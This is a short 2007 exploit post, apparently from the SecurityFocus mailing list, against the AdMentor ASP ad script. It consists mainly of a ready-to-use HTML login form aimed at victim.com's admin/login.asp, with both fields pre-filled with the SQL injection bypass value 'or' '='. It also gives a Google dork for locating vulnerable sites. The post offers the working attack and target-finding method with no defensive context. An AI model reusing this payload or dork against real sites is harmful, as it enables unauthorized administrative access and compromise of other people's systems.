AdMentor Script Remote SQL injection Exploit Feb 20 2007 07:02PM
crazy_king eno7 org
<html><title>AdMentor Script Remote SQL injection Exploit</title>
========================================================================
=======================
<p><b><font size="2">[Script Name: <font color="#0000FF">AdMentor admin SQL
injection
</font></font></b></p>
<p><b><font size="2">[Coded by : <font color="#FF0000">Cr@zy_King
</font></font></b></p>
<p><b><font size="2">[Author : <font color="#FF0000">Cr@zy_King
</font></font></b></p>
<p><b><font size="2">[Contact : <font color="#FF0000">Crazy_King (at) Eno7 (dot) org [email concealed]
</font></font></b></p>
<p><b><font size="2">[Dork : <font color="#0000FF">inurl:"admentor/admin"
</font></font></b></p>
<p><b><font size="2">[Dork Ex. : <font
color="#0000FF">http://www.google.com.tr/search?hl=tr&q=inurl%3A%22admen
tor%2Fadmin%22&btnG=Google%27da+Ara&meta=
</font></font></b></p>
<p><b><font size="2">[S.Page : <font
color="#0000FF">http://www.aspcode.net/products/admentor
</font></font></b></p>
<p><b><font size="2">[Thanks : <font color="#008000">Erne & ApAci & Eno7 &
Uyuss & Liz0zim & Thehacker
& Xoron & Ajann</font></font></b>
========================================================================
=======================
</p>
<FORM NAME=giris ACTION="http://victim.com/[path to script]/admin/login.asp"
METHOD=post>
<table align=center>
<td>Kullanici Adi:</td><td><INPUT NAME=kullanici class="input" value="'or' '='"
SIZE=15></td>
</tr><tr>
<td>Sifre:</td><td><INPUT NAME=parola TYPE=text class="input" value="'or' '='"
SIZE=15></td>
</tr><tr>
<td align=center colspan=2><BUTTON class="input" TYPE=submit>Giris</BUTTON></td>
<b><font face="Verdana" size="2" color="#008000">Exploit Coded By
Cr@zy_King</font></b></p>
</tr></table></form></html>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus